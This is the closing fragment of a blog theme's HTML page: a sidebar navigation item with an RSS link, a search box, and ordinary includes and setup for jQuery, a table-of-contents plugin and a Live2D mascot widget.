    </li>
    <li class="nav-item">
      
        <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
          <i class="fe fe-feed"></i>
        </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/lazyload.min.js"></script>
<script src="/js/busuanzi-2.3.pure.min.js"></script>

  <script src="/fancybox/jquery.fancybox.min.js"></script>



  <script src="/js/tocbot.min.js"></script>
  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>


<script src="/js/ocean.js"></script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>